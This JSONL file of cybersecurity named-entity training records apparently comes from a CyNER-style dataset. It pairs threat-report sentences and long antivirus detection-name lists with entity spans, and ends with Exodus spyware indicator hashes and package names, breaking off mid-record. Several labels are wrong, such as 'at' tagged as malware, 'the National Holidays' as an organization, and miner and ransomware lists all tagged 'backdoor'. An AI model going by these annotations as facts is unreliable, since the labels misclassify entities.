{"text": "A backdoor also known as: Heur.Win32.Veebee.1!O Trojan.Dyname.r3 Trojan.Dropper Trojan.VB.Win32.118717 Trojan.VB!K6eQMCc/nZg Trojan.Win32.VB.ckbb Worm.Win32.WBNA.ROC TR/Dynamer.dtc.17594 W32/Trojan.MKPV-4364 Trojan/Win32.VB Trojan.VB Win32/AutoRun.VB.BDM Trojan-Banker.Win32.Bancos W32/VB.CKBB!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002628", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.eHeur.Virus02 Trojan/W32.Cobalt.196608 Trojan.Conbea Win.Tool.CobaltStrike-6336852-0 HackTool.Win32.Cobalt.k Trojan.Win32.Cobalt.egtrej BackDoor.Meterpreter.42 BehavesLike.Win32.Backdoor.ch HackTool.CobaltStrike HackTool/Win32.Cobalt Trojan.Application.HackTool.CobaltStrike.1 HackTool.Win32.Cobalt.k HackTool/Win32.Cobalt.R197271 TrojanDownloader.Agresbeak RiskWare.HackTool Riskware.HackTool!t96XHdFe7u4 W32/CobaltStrike_Beacon.A!tr Win32/Application.Hacktool.e79", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002631", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Graftor.D1A90 Win32.Trojan.Kryptik.afz Trojan.Proxy2.1039 BehavesLike.Win32.BadFile.lc Trojan-Dropper.Win32.Injector TR/Obfuscated.sarli Trojan:Win32/Riern.M TScope.Malware-Cryptor.SB Win32/Trojan.Downloader.9c1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002633", "source": "cyner2_train"}}
{"text": "Talos has named this malware KONNI.", "spans": {"ORGANIZATION: Talos": [[0, 5]], "MALWARE: malware KONNI.": [[21, 35]]}, "info": {"id": "cyner2_train_002634", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Application.MiniFtp.A Server-FTP.Win32.MiniFTP!O Backdoor.Banito.Win32.283 Backdoor/Banito.nk Application.MiniFtp.A Win32.Trojan.WisdomEyes.16070401.9500.9964 W32/VirTool.CJ Win.Trojan.Miniftp-1 Application.MiniFtp.A not-a-virus:Server-FTP.Win32.MiniFTP.c Application.MiniFtp.A Trojan.Win32.Banito.xnaq Backdoor.Win32.Banito.81920[h] Application.MiniFtp.A Backdoor.Win32.Banito.nk0 BackDoor.Bandito.2207 W32/Tool.XUIH-6856 Hacktool.Miniftp APPL/MiniFTP.A RiskWare[Server-FTP]/Win32.MiniFTP.c Backdoor.W32.Banito.lx25 Backdoor:Win32/Shesmi.A Unwanted/Win32.MiniFTP.R63415 Backdoor.Sdbot!9v31gLa9+gE Backdoor.Win32.Formador.b W32/FTPMini.A!tr Bck/Formador.B Win32/Backdoor.662", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002635", "source": "cyner2_train"}}
{"text": "This pulse includes indicators from this analysis, and indicators from other campaigns that employ related malware.", "spans": {"ORGANIZATION: pulse": [[5, 10]], "THREAT_ACTOR: campaigns": [[77, 86]], "MALWARE: malware.": [[107, 115]]}, "info": {"id": "cyner2_train_002637", "source": "cyner2_train"}}
{"text": "We refer to this group of attackers as Moonlight, after the name the attackers chose for one of their command-and-control domains.", "spans": {"THREAT_ACTOR: group of attackers as Moonlight,": [[17, 49]], "THREAT_ACTOR: attackers": [[69, 78]]}, "info": {"id": "cyner2_train_002639", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Endowerpo Win32.Trojan.WisdomEyes.16070401.9500.9987 Backdoor.Industroyer Win32.Backdoor.Industroyer.F Trojan.Win32.Industroyer.c Trojan.Win32.Industroyer.136704.A Trojan.Industroyer.5 Trojan.Industroyer.Win32.3 Trojan.Industroyer.b Trojan.Win32.Industroyer.c Trojan:Win32/CrashOverride.A Trojan/Win32.Industroyer.R202380 Trojan.Industroyer Trojan.Industroyer!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002640", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Downloader.Delf.RAN Downloader.Delf.Win32.2328 Trojan.Downloader.Delf.RAN W32/Trojan2.JVAP Downloader.MisleadApp Win.Trojan.Adpclient-2 Trojan.Downloader.Delf.RAN Trojan.Win32.Delf.crqcbd Troj.Downloader.W32.Delf.spu!c Trojan.Downloader.Delf.RAN TrojWare.Win32.TrojanDownloader.Murlo.~JH2 Trojan.Downloader.Delf.RAN Trojan.DownLoad.32205 Trojan.Win32.Adpclient Trojan.Downloader.Delf.RAN Trojan/Win32.Xema.C73230 Trojan.Downloader.Delf.RAN Trojan.DL.Delf!ywDF9K4Uqh8 Trojan/Win32.lssj.2cc.rgrk", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002641", "source": "cyner2_train"}}
{"text": "The SLocker family is one of the oldest mobile lock screen and file-encrypting ransomware and used to impersonate law enforcement agencies to convince victims to pay their ransom.", "spans": {"MALWARE: The SLocker family": [[0, 18]], "MALWARE: oldest mobile lock screen and file-encrypting ransomware": [[33, 89]], "ORGANIZATION: enforcement agencies": [[118, 138]]}, "info": {"id": "cyner2_train_002642", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 BAT/Runner.AV BehavesLike.Win32.Downloader.hh", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002643", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDownloader:MSIL/Faksost.B!bit", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002644", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Exploit.Win32.Servu!O Exploit.Win32.Servu.ab Exploit.Win32.Servu.dxeal Exploit.W32.Servu.ab!c Win32.Trojan.Inject.Auto Trojan.Starter.973 Exploit.Servu.Win32.15 Muster.c Trojan:Win32/Cryptrun.A W32/ServU.AB!exploit Trojan[Exploit]/Win32.Servu Trojan.Win32.Exploit.45056[h] Exploit.Win32.Servu.ab Trojan:Win32/Cryptrun.A Muster.c Exploit.Servu Exploit.Servu!ffzFcMCTx/E Exploit.Win32.Servu Exploit.DUB Trj/ServU.GM", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002645", "source": "cyner2_train"}}
{"text": "We analysed the XData code and found two host-based kill-switches one of them is about detecting an antivirus running on an infected machine.", "spans": {"MALWARE: XData code": [[16, 26]], "SYSTEM: antivirus": [[100, 109]], "SYSTEM: infected machine.": [[124, 141]]}, "info": {"id": "cyner2_train_002647", "source": "cyner2_train"}}
{"text": "There's no vulnerability involved.", "spans": {}, "info": {"id": "cyner2_train_002648", "source": "cyner2_train"}}
{"text": "More recently, we have also seen an increase in activity targeting Ukraine.", "spans": {}, "info": {"id": "cyner2_train_002649", "source": "cyner2_train"}}
{"text": "The victims include establishments in the United States, Canada, Europe, Middle East, and Latin America.", "spans": {}, "info": {"id": "cyner2_train_002650", "source": "cyner2_train"}}
{"text": "These attacks, which occurred in November 2016 and January 2017, reportedly affected thousands of computers across multiple government and civil organizations in Saudi Arabia and elsewhere in Gulf states.", "spans": {"SYSTEM: computers": [[98, 107]], "ORGANIZATION: government": [[124, 134]], "ORGANIZATION: civil organizations": [[139, 158]]}, "info": {"id": "cyner2_train_002651", "source": "cyner2_train"}}
{"text": "Our findings show that Rocket Kitten is still active, retains a growing level of persistence, and acts ever more aggressively in terms of attack method.", "spans": {"THREAT_ACTOR: Rocket Kitten": [[23, 36]]}, "info": {"id": "cyner2_train_002652", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.StartPage.311296.F Trojan.Senphiv.A W32/MalwareS.ZPG VBDloader.E TROJ_DLOAD.SMT Trojan.Win32.StartPage.fss TrojWare.Win32.Pincav.IAD TROJ_DLOAD.SMT TrojanDownloader:Win32/Senphiv.A Downloader/Win32.VB W32/Risk.QGTQ-7423 Trojan-Downloader.Win32.Senphiv W32/StartPage.CTK!tr Trj/StartPage.DAW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002654", "source": "cyner2_train"}}
{"text": "Category: Unit 42 Tags: CVE-2012-0158, Downloader, QuasarRAT, Subaat", "spans": {"ORGANIZATION: Unit 42": [[10, 17]], "MALWARE: Downloader, QuasarRAT, Subaat": [[39, 68]]}, "info": {"id": "cyner2_train_002657", "source": "cyner2_train"}}
{"text": "Analysis of this malware is presented to provide the computer network defense CND community with indicators of this malware.", "spans": {"MALWARE: malware": [[17, 24]], "ORGANIZATION: computer network defense CND community": [[53, 91]], "MALWARE: malware.": [[116, 124]]}, "info": {"id": "cyner2_train_002659", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Hoax.Win32.BadJoke!O W32/Cietas.B@MM Win.Joke.Bomov-1 Hoax.Win32.BadJoke.Cierrame Riskware.Win32.Cierrame.hpzm Joke.Win32.Cierrame.A Trojan.Tetas Backdoor.PePatch.Win32.18825 not-virus:Joke.Win32.Cierrame HackTool[Hoax]/Win32.Cierrame Win32.Joke.Cierrame.kcloud Hoax.Win32.BadJoke.Cierrame Win-AppCare/Badjoke.274432 Win32/Cierrame.A Win32.Trojan-psw.Badjoke.Ajbz Hoax.Win32.BadJoke.Cierrame", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002660", "source": "cyner2_train"}}
{"text": "Operation Armageddon, active since at least mid-2013, exposes a cyber espionage campaign devised to provide a military advantage to Russian leadership by targeting Ukrainian government, law enforcement, and military officials in order to steal information that can provide insight into near term Ukrainian intentions and plans.", "spans": {"THREAT_ACTOR: Operation Armageddon,": [[0, 21]], "MALWARE: at": [[35, 37]], "ORGANIZATION: Russian leadership": [[132, 150]], "ORGANIZATION: Ukrainian government, law enforcement, and military officials": [[164, 225]]}, "info": {"id": "cyner2_train_002661", "source": "cyner2_train"}}
{"text": "That method relied on enterprise certificates from Apple—which are costly, since the certificates needed are changed very frequently.", "spans": {"ORGANIZATION: Apple—which": [[51, 62]]}, "info": {"id": "cyner2_train_002662", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.316D Trojan/Buzus.yca W32/Trojan2.EHHN Win.Trojan.Buzus-3134 Trojan.Win32.Buzus.bohnlg Trojan.Packed.650 BehavesLike.Win32.Ramnit.tc W32/Trojan.ACNM-2721 Troj.W32.Buzus.yca!c Trojan/Win32.Buzus.C104217 Trojan-PWS.Win32.IMMultiPass Win32/Application.1b1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002664", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Application.Alphaeon.4 Win32.Trojan.WisdomEyes.16070401.9500.9952 Trojan.Proxy2.1030 BehavesLike.Win32.AdwareConvertAd.gh Trojan:Win32/Vkhost.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002665", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HaluosysLTU.Trojan Trojan-Spy/W32.ZBot.358400.V Trojan.Buzus.Win32.114137 Trojan/Spy.Zbot.aao Win32.Trojan.WisdomEyes.16070401.9500.9607 Trojan.Win32.Winlock.cqkdnb TrojWare.Win32.Injector.AHSP Trojan.Winlock.8004 TrojanSpy.Zbot.diqw Trojan/Win32.Buzus TrojanDownloader:Win32/Dimegup.A Trojan/Win32.Zbot.R69076 TScope.Malware-Cryptor.SB Win32/Spy.Zbot.AAO TrojanSpy.Zbot!SJBAuE7A31M Trojan.Win32.Ransom", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002666", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Downloader.Win32.Small.aggy Trojan-Downloader.Win32.Small.aggy DLOADER.Trojan TrojanDownloader:Win32/Yellsob.A Trojan.PSW.Win32.GameOL.tbi", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002667", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Perseus.MSIL Trojan.Ransomcrypt.AE TR/Samas.orhr Trojan.MSILPerseus.D4B2D Ransom:MSIL/Samas.A Trj/GdSda.A Trojan.MSIL.Filecoder", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002669", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.KryptikCRTD.Win32.11290 Trojan.Dropper.166 Win32.Trojan.WisdomEyes.16070401.9500.9769 Trojan.Win32.Dapato.enqgpq Win32.Trojan.Kryptik.Pdwn TrojWare.Win32.Spy.Tewgol.A BackDoor.Radmin.150 W32.Trojan.Dropper TR/Fuery.znvrd Dropper/Win32.Dapato.C1935389 Malware-Cryptor.Limpopo Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002670", "source": "cyner2_train"}}
{"text": "WithSecure has revealed the latest details of the DUCKTAIL malware operation, which was previously described by Deep Instinct Threat Lab as a strategic threat that was being tested to avoid detection.", "spans": {"ORGANIZATION: WithSecure": [[0, 10]], "MALWARE: the DUCKTAIL malware": [[46, 66]], "ORGANIZATION: Deep Instinct Threat Lab": [[112, 136]], "MALWARE: threat": [[152, 158]]}, "info": {"id": "cyner2_train_002671", "source": "cyner2_train"}}
{"text": "Website owners find the classical blog format too restrictive, use the plugin to add custom elements to their posts.", "spans": {}, "info": {"id": "cyner2_train_002673", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.SennaOneMaker!O TROJ_SENNAONEMAKER_0000000.TOMA Win32.Trojan.RSP.b W32/Trojan.FIW Backdoor.SubSeven Win32/RSP.A TROJ_SENNAONEMAKER_0000000.TOMA Win.Trojan.Win-52 Trojan.Win32.SennaOneMaker.dxcclv Backdoor.Win32.HostCtrl.253674 TrojWare.Win32.RSP.A Trojan.MulDrop.8 W32/Trojan.UUJQ-7044 TrojanDropper.Win32.RSP.a TR/Multidropper.A Trojan[Dropper]/Win32.SennaOneMaker Win32.Troj.RSP.a.kcloud Troj.Dropper.W32.SennaOneMaker.lcEu TrojanDropper:Win32/SennaOneMaker.A Dropper/SennaOneMaker.6556 TrojanDropper.SennaOneMaker Trj/Sennaonemaker.B Trojan.DR.SennaOneMaker!laIkEqmRI+A W32/SennaOneMaker.V20!tr.dr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002674", "source": "cyner2_train"}}
{"text": "Further research revealed a connection between these attacks and members of the so-called Gaza Hackers Team. We refer to this campaign as Molerats.", "spans": {"THREAT_ACTOR: Gaza Hackers Team.": [[90, 108]], "THREAT_ACTOR: campaign": [[126, 134]], "THREAT_ACTOR: Molerats.": [[138, 147]]}, "info": {"id": "cyner2_train_002675", "source": "cyner2_train"}}
{"text": "A backdoor also known as: virus.office.qexvmc.1075", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002676", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/VB.aaa W32/MalwareF.JYOH Spyware.Keylogger Trojan.Win32.VB.butwpn W32.W.VB.aaa!c Win32.Worm-im.Vb.Pbfr W32/Retomo.worm W32/Risk.KAPY-3991 Trojan:Win32/Kxhack.B WORM/VB.aaa Trojan:Win32/Kxhack.B W32/Retomo.worm Worm.VB!zIluMBtcaN8 IM-Worm.Win32.VB W32/Retomo.AAA!worm.im Win32/Worm.cc6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002679", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnGamesLT250912NLAJIR.Trojan Rootkit.Win32.TDSS!O Trojan.Fsysna Trojan/TDSS.rhu TSPY_DOWNLOADER_BK220264.TOMC Win32.Trojan.WisdomEyes.16070401.9500.9999 Infostealer.Gampass TSPY_DOWNLOADER_BK220264.TOMC Win.Downloader.Pangu-2 Trojan.Win32.Fsysna.epjv Trojan.Win32.TDSS.bkqey Trojan.Win32.Tdss.37888.H Troj.W32.Fsysna!c BackDoor.Tdss.3314 Rootkit.TDSS.Win32.3904 BehavesLike.Win32.Msposer.nh Trojan/DDos.af W32.Malware.Downloader Trojan[Rootkit]/Win32.TDSS Win32.TrojDownloader.wk.kcloud Trojan.Symmi.D1492 Trojan.Win32.Fsysna.epjv TrojanDownloader:Win32/Mypo.A Trojan/Win32.Tdss.C50395 Rootkit.TDSS Win32.Trojan.Fsysna.Hros Rootkit.TDSS!r3YXF8ZrJBY W32/TDSS.RHU!tr.rkit Win32/Trojan.f75", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002681", "source": "cyner2_train"}}
{"text": "Instead of ALL American spam recipients receiving the malware, however, only those whose email ends in the country code .us received this malware.", "spans": {"MALWARE: malware,": [[54, 62]], "MALWARE: malware.": [[138, 146]]}, "info": {"id": "cyner2_train_002683", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.WsExplorer.Worm Virus.Win32.VB!O W32/Autorun.worm.h Win32.Trojan.VB.c Infostealer.Gampass Win32/Jampork.D WORM_VB.DVP Virus.Win32.VB.bu Virus.Win32.VB.unsvo Trojan.Win32.PSWIGames.36864.M Virus.VB.Win32.87 WORM_VB.DVP BehavesLike.Win32.VBObfus.cz Trojan/PSW.Jianghu.ei W32/VB.BU Virus/Win32.VB.bu Trojan.Heur.EED21E7 W32.VB.tngk Virus.Win32.VB.bu Worm:Win32/Jampork.A Trojan/Win32.OnlineGameHack.R868 TScope.Trojan.VB W32/VB.ADO Trojan.Win32.VB.mss Virus.Win32.VB.bu W32/VB.BU!tr Win32/Worm.VB.V", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002684", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.eHeur.Virus02 Virus.Win32.Sality!O Win32/TrojanDownloader.AutoHK.AN BackDoor.Bladabindi.13678 BehavesLike.Win32.Downloader.fc Trojan-Downloader.Win32.Autohk Trojan.Reconyc.eur TR/AD.AhkDldr.tstej Trojan/MSIL.Disfa TrojanDownloader:Win32/AutoHK.A!bit Trojan.Cossta", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002689", "source": "cyner2_train"}}
{"text": "This could be an indicator of the massive cyber attack preparation before the National Holidays in Ukraine.", "spans": {"ORGANIZATION: the National Holidays": [[74, 95]]}, "info": {"id": "cyner2_train_002690", "source": "cyner2_train"}}
{"text": "Once clicked, an attacker can use the embedded code for various malicious purposes, such as stealing data or installing ransomware on victims' systems.", "spans": {"THREAT_ACTOR: attacker": [[17, 25]], "MALWARE: installing ransomware": [[109, 130]], "SYSTEM: victims' systems.": [[134, 151]]}, "info": {"id": "cyner2_train_002691", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.IRCBot W32.Spybot.Worm Win.Exploit.Fnstenv_mov-1 BehavesLike.Win32.Downloader.mc W32.Hack.Tool EXP/MS06-040.B HackTool:Win32/Lpdexpl.A Backdoor.IRCBot Trj/CI.A Exploit.MS05-017!2vyTKSxF9zk Win32/Trojan.Exploit.8b7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002692", "source": "cyner2_train"}}
{"text": "Security firm Kaspersky has published a new blog regarding a backdoor that was deployed through the supply chain attack on 3CX, in combination with an info-stealer.", "spans": {"ORGANIZATION: Security firm Kaspersky": [[0, 23]], "MALWARE: backdoor": [[61, 69]], "ORGANIZATION: 3CX,": [[123, 127]], "MALWARE: info-stealer.": [[151, 164]]}, "info": {"id": "cyner2_train_002693", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.TisroparLTAAH.Trojan Trojan.Ruandmel Trojan.Heur.FU.E2E781 Win32.Trojan.WisdomEyes.16070401.9500.9922 TROJ_GAUDOX.SM TrojWare.Win32.Ruandmel.AG Trojan.Inject2.57861 TROJ_GAUDOX.SM BehavesLike.Win32.Trojan.kh TrojanDropper.Injector.bkgu Trojan:Win32/Ruandmel.A!bit Trojan/Win32.Dynamer.C1318203 Hoax.Blocker Trojan.MalPack Trojan.Blocker!KJVutD4QUXc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002694", "source": "cyner2_train"}}
{"text": "Of these, SeaDuke is a simple trojan made interesting by the fact that it's written in Python.", "spans": {"MALWARE: SeaDuke": [[10, 17]], "MALWARE: trojan": [[30, 36]], "SYSTEM: Python.": [[87, 94]]}, "info": {"id": "cyner2_train_002695", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.RepakMiner.94720 Trojan.CoinMiner.Win32.220 Trojan/CoinMiner.ej Win32.Trojan.WisdomEyes.16070401.9500.9936 Trojan.Win32.RepakMiner.pgm Trojan.Win32.RepakMiner.csnwjo Win32.Trojan.Repakminer.Pezd Trojan.BtcMine.119 Trojan/RepakMiner.c Trojan/Win32.RepakMiner Trojan:Win32/Tarcloin.G Trojan.Zusy.DEA69 Trojan.Win32.RepakMiner.pgm Trojan/Win32.RepakMiner.C189719 Trojan.RepakMiner Win32/CoinMiner.EJ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002696", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_GE.B172C45D Win.Trojan.Autorun-15347 Worm.Win32.AutoRun.cgfw Trojan.Win32.AutoRun.gzlvd Worm.W32.Autorun!c Trojan.MulDrop4.47 TROJ_GE.B172C45D BehavesLike.Win32.Dropper.tc Worm.Win32.Honditost Worm/AutoRun.allw Worm/Win32.AutoRun Worm:Win32/Honditost.A Worm.Win32.AutoRun.cgfw Worm.AutoRun Worm.AutoRun!5JHcPe4YmAc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002697", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.P2p.Vance.A Worm.Vance.Win32.2 W32/Vance.a WORM_VANCE.T Win32.Trojan.WisdomEyes.16070401.9500.9978 W32/P2PWorm.DU W32.SillyP2P WORM_VANCE.T Worm.P2p.Vance.A P2P-Worm.Win32.Vance.a Worm.P2p.Vance.A Trojan.Win32.Vance.eofq W32.W.Vance.a!c Worm.P2p.Vance.A Worm.P2p.Vance.A Win32.HLLW.Vance Worm.Win32.Vance W32/P2P_Worm.XQZJ-6276 Worm/Vance.c Worm:Win32/Vance.A WORM/Vance.A Worm[P2P]/Win32.Vance Worm.P2p.Vance.A P2P-Worm.Win32.Vance.a Worm:Win32/Vance.A Worm.P2p.Vance.A Worm.Vance Trj/CI.A Win32/Vance.A Win32.Worm-p2p.Vance.Svrm Worm.P2P.Vance!6yBrY3ioCyI W32/Vance.A!worm.p2p", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002699", "source": "cyner2_train"}}
{"text": "The operation is very quick and quiet.", "spans": {}, "info": {"id": "cyner2_train_002700", "source": "cyner2_train"}}
{"text": "Bedep was known to be the notorious ad fraud malware and vawtrak is a banking trojan following the success of Zeus.", "spans": {"MALWARE: Bedep": [[0, 5]], "MALWARE: fraud malware": [[39, 52]], "MALWARE: vawtrak": [[57, 64]], "MALWARE: banking trojan": [[70, 84]], "MALWARE: Zeus.": [[110, 115]]}, "info": {"id": "cyner2_train_002702", "source": "cyner2_train"}}
{"text": "So far, the malware primarily affects iOS users in mainland China and Taiwan.", "spans": {"MALWARE: malware": [[12, 19]], "ORGANIZATION: iOS users": [[38, 47]]}, "info": {"id": "cyner2_train_002703", "source": "cyner2_train"}}
{"text": "A Trojan for Linux that was named Linux.Mirai has several predecessors.", "spans": {"SYSTEM: Linux": [[13, 18]]}, "info": {"id": "cyner2_train_002704", "source": "cyner2_train"}}
{"text": "This spambot, commonly downloaded by the Andromeda malware, has been observed delivering pharmaceutical industry spam as well as further propagating the main Andromeda bot.", "spans": {"MALWARE: spambot,": [[5, 13]], "MALWARE: Andromeda malware,": [[41, 59]], "ORGANIZATION: pharmaceutical industry": [[89, 112]], "MALWARE: Andromeda bot.": [[158, 172]]}, "info": {"id": "cyner2_train_002705", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Win32.Delf!O Backdoor.Delf.Win32.12791 W32/Backdoor.ZRKL-8278 Backdoor.Trojan Trojan.Win32.Delf.iuqg Win32.Backdoor.Delf.Sxnw Trojan.PWS.Banker.26677 Trojan-Spy.Banker W32/Backdoor2.CTBF Backdoor/Delf.hfo Trojan[Backdoor]/Win32.Delf Trojan:Win32/Braba.D Trojan.UserStartup.EB690C Trojan/Win32.Delf.R104794 TScope.Trojan.Delf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002706", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Application.Downloader.ALJ Pua.Downloader Win32.Trojan.WisdomEyes.16070401.9500.9999 Application.Downloader.ALJ Application.Downloader.ALJ Trojan.Win32.Z.Downloader.179560 Application.Downloader.ALJ BehavesLike.Win32.Downloader.ch Application.Downloader.ALJ Application.Downloader.Alj!c Trj/CI.A Win32/Application.Downloader.dad", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002707", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Ransom.Win32.Foreign!O Trojan.Foreign Win32.Trojan.WisdomEyes.16070401.9500.9823 Win32/Ransom.ANJ Ransom_Foreign.R039C0DKF17 Trojan-Ransom.Win32.Foreign.wy Troj.Ransom.W32!c Win32.Trojan.Foreign.Wqdm Trojan.DownLoad2.55226 Trojan.Foreign.Win32.208 Ransom_Foreign.R039C0DKF17 BehavesLike.Win32.Dropper.cc Trojan.Foreign.ays Trojan[Ransom]/Win32.Foreign Trojan.Graftor.D35EB Trojan.Win32.A.Foreign.142848[UPX] Trojan-Ransom.Win32.Foreign.wy Trojan:Win32/Ransirac.A Trojan/Win32.Foreign.R20679 Hoax.Foreign Trojan.Foreign!cDyTfOA7GhM Win32/Trojan.7b3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002708", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32.Trojan.Spy.Eawf BehavesLike.Win32.Trojan.qm W32/Trojan.NEXM-1236 Trojan.MSILKrypt.4 TrojanSpy:MSIL/Fitin.A Trojan.MSIL.Spy Trj/GdSda.A Win32/Trojan.948", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002709", "source": "cyner2_train"}}
{"text": "The Scarcruft Group aka APT37, a North Korean APT group, is believed to have been active since 2016 and continues to carry out attacks against institutions and political organizations around the world until 2023.", "spans": {"THREAT_ACTOR: The Scarcruft Group": [[0, 19]], "THREAT_ACTOR: APT37,": [[24, 30]], "THREAT_ACTOR: North Korean APT group,": [[33, 56]], "ORGANIZATION: institutions": [[143, 155]], "ORGANIZATION: political organizations": [[160, 183]]}, "info": {"id": "cyner2_train_002710", "source": "cyner2_train"}}
{"text": "Further details in it reflect characteristics of Exodus ( such as the bypass of power managers we described from Exodus One , and more ) : Indicators of Compromise Exodus One 011b6bcebd543d4eb227e840f04e188fb01f2335b0b81684b60e6b45388d3820 0f5f1409b1ebbee4aa837d20479732e11399d37f05b47b5359dc53a4001314e5 2055584625d24687bd027a63bc0b8faa7d1a854a535de74afba24840a52b1d2f 26fef238028ee4b5b8da631c77bfb44ada3d5db8129c45dea5df6a51c9ea5f55 33a9da16d096426c82f150e39fc4f9172677885cfeaedcff10c86414e88be802 34d000ee1e36efd10eb37e2b79d69249d5a85682a61390a89a1b9391c46bf2ba 4f6146956b50ae3a6e80a1c1f771dba848ba677064eb0e166df5804ac2766898 5db49122d866967295874ab2c1ce23a7cde50212ff044bbea1da9b49bb9bc149 70e2eea5609c6954c61f2e5e0a3aea832d0643df93d18d7d78b6f9444dcceef0 80810a8ec9624f317f832ac2e212dba033212258285344661e5da11b0d9f0b62 8453ce501fee1ca8a321f16b09969c517f92a24b058ac5b54549eabd58bf1884 a37f5d2418c5f2f64d06ba28fe62edee1293a56158ddfa9f04020e316054363f db59407f72666526fca23d31e3b4c5df86f25eff178e17221219216c6975c63f e0acbb0d7e55fb67e550a6bf5cf5c499a9960eaf5f037b785f9004585202593b Exodus One Package Names com.phonecarrier.linecheck rm.rf operatore.italia it.offertetelefonicheperte it.servizipremium assistenza.sim assistenza.linea.riattiva assistenza.linea it.promofferte Exodus Two 64c11fdb317d6b7c9930e639f55863df592f23f3c7c861ddd97048891a90c64b a42a05bf9b412cd84ea92b166d790e8e72f1d01764f93b05ace62237fbabe40e Exodus Two ELF Utilities 00c787c0c0bc26caf623e66373a5aaa1b913b9caee1f34580bdfdd21954b7cc4 11499ff2418f4523344de81a447f6786fdba4982057d4114f64db929990b4b59 13ec6cec511297ac3137cf7d6e4a7c4f5dd2b24478a06262a44f13a3d61070b6 3c9f08b3280851f54414dfa5a57f40d3b7be7b73736fa0ba21b078e75ce54d33 3ee3a973c62ba5bd9eab595a7c94b7a26827c5fa5b21964d511ab58903929ec5 47449a612697ad99a6fbd6e02a84e957557371151f2b034a411ebb10496648c8 48a7dd672931e408662d2b5e1abcd6ef00097b8ffe3814f0d2799dd6fd74bd88 824ad333320cbb7873dc49e61c14f749b0e0d88723635524463f2e6f56ea133a b46f282f9a1bce3798faee3212e28924730a657eb93cda3824c449868b6ee2e7 c228a534535b22a316a97908595a2d793d0fecabadc32846c6d1bfb08ca9a658 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 e3f65f84dd6c2c3a5a653a3788d78920c0321526062a6b53daaf23fa57778a5f Command & Controls ad1.fbsba [ .", "spans": {"MALWARE: Exodus": [[49, 